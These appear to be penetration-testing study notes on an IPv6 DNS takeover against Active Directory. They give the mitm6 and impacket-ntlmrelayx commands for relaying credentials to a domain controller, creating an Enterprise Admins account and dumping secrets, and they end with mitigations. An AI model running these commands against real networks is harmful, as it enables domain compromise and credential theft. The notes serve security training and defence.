IPv6 Attacks

Overview

Typically machines on networks run on IPv4, sometimes not even utilizing IPv6 at all but still have it enabled by default. In a network there is usually nobody doing DNS for IPv6

We can leverage this by replying to all DHCPv6 messages, giving them a Link-Local address and telling them that we're their default DNS server.

MITM6 paired with Impacket-ntlmrelayx using LDAP relaying, can allow us to pull a lot of information from the Domain Controller and even create a new user account in the Enterprise Admins group when a Domain Administrator logs into the network. This can allow us to run secretsdump against the Domain Controller.

IPv6 DNS Takeover

sudo mitm6 -i eth0 -d PNPT.local
impacket-ntlmrelayx -6 -t ldaps://192.168.1.129 -wh evil.PNPT.local -l lootme

Mitigation

  • Disable IPv6

  • Block inbound and outbound DHCPv6

  • Block inbound ICMPv6

  • Disable WPAD via Group Policy (WinHttpAutoProxySvc)

  • Enable LDAP signing

  • Dont allow delegation for Administrative users

PreviousShell AcessNextKerbrute